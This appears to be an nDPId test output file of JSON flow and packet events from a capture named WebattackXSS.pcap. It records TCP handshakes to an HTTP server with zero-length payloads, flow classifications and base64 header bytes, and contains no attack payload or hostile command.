+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347814066,"flow_last_seen":1499347814066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347814066,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1499347814066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347814066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NuNAAD4Gju2sEAABwKgKMoDOAFApMBSaAAAAAKACchB8ZgAAAgQFtAQCCAoBPCJ5AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":2,"flow_last_seen":1499347814066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347814066,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgM6yTRTHKTAUm6AScSC+XAAAAgQFtAQCCAoD5fPuATwieQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7055,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":3,"flow_last_seen":1499347814067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347814067,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NuRAAD4GjvSsEAABwKgKMoDOAFApMBSbsk0UyIAQAOVdZAAAAQEICgE8InkD5fPu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347815351,"flow_last_seen":1499347815351,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347815351,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1499347815351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347815351,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aqNAAD4GWy2sEAABwKgKMoDcAFBV2UkZAAAAAKACchAZ7wAAAgQFtAQCCAoBPCO6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":2,"flow_last_seen":1499347815351,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347815351,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgNzeXu4gVdlJGqAScSBVOQAAAgQFtAQCCAoD5fUvATwjugEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":3,"flow_last_seen":1499347815352,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347815352,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aqRAAD4GWzSsEAABwKgKMoDcAFBV2Uka3l7uIYAQAOX0PwAAAQEICgE8I7sD5fUv"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347816657,"flow_last_seen":1499347816657,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347816657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1499347816657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347816657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lQ1AAD4GMMOsEAABwKgKMoDqAFAyzLAMAAAAAKACchDUswAAAgQFtAQCCAoBPCUBAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":2,"flow_last_seen":1499347816658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347816658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgOp6zxHVMsywDaAScSBOkwAAAgQFtAQCCAoD5fZ1ATwlAQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":3,"flow_last_seen":1499347816658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347816658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lQ5AAD4GMMqsEAABwKgKMoDqAFAyzLANes8R1oAQAOXtmgAAAQEICgE8JQED5fZ1"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347819250,"flow_last_seen":1499347819250,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347819250,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1499347819250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347819250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LORAAD4GmOysEAABwKgKMoEEAFDtQwttAAAAAKACchC8OQAAAgQFtAQCCAoBPCeJAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":2,"flow_last_seen":1499347819251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347819251,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgQQkyBmr7UMLbqAScSCBwQAAAgQFtAQCCAoD5fj+ATwniQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":3,"flow_last_seen":1499347819251,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347819251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LOVAAD4GmPOsEAABwKgKMoEEAFDtQwtuJMgZrIAQAOUgyQAAAQEICgE8J4kD5fj+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347820510,"flow_last_seen":1499347820510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347820510,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1499347820510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347820510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zKZAAD4G+SmsEAABwKgKMoESAFBNgeRiAAAAAKACchCBvQAAAgQFtAQCCAoBPCjEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":2,"flow_last_seen":1499347820510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347820510,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgRIUqvVqTYHkY6AScSB6aAAAAgQFtAQCCAoD5fo5ATwoxAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":3,"flow_last_seen":1499347820510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347820510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zKdAAD4G+TCsEAABwKgKMoESAFBNgeRjFKr1a4AQAOUZcAAAAQEICgE8KMQD5fo5"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347823117,"flow_last_seen":1499347823117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823117,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1499347823117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347823117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vRAAD4GxtusEAABwKgKMoEsAFBFq9WkAAAAAKACchCVqwAAAgQFtAQCCAoBPCtQAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":2,"flow_last_seen":1499347823117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347823117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgSyhFRrnRavVpaAScSDZ4wAAAgQFtAQCCAoD5fzEATwrUAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":3,"flow_last_seen":1499347823118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347823118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vVAAD4GxuKsEAABwKgKMoEsAFBFq9WloRUa6IAQAOV46wAAAQEICgE8K1AD5fzE"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347687089,"flow_last_seen":1499347692807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347688364,"flow_last_seen":1499347693807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347689613,"flow_last_seen":1499347694807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347692128,"flow_last_seen":1499347697807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347824426,"flow_last_seen":1499347824426,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347824426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1499347824426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347824426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80mVAAD4G82qsEAABwKgKMoE6AFCPwv7yAAAAAKACchAg8QAAAgQFtAQCCAoBPCyXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":2,"flow_last_seen":1499347824426,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347824426,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgToZT9eBj8L+86AScSAvDQAAAgQFtAQCCAoD5f4MATwslwEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":3,"flow_last_seen":1499347824427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347824427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00mZAAD4G83GsEAABwKgKMoE6AFCPwv7zGU\/XgoAQAOXOFAAAAQEICgE8LJcD5f4M"} 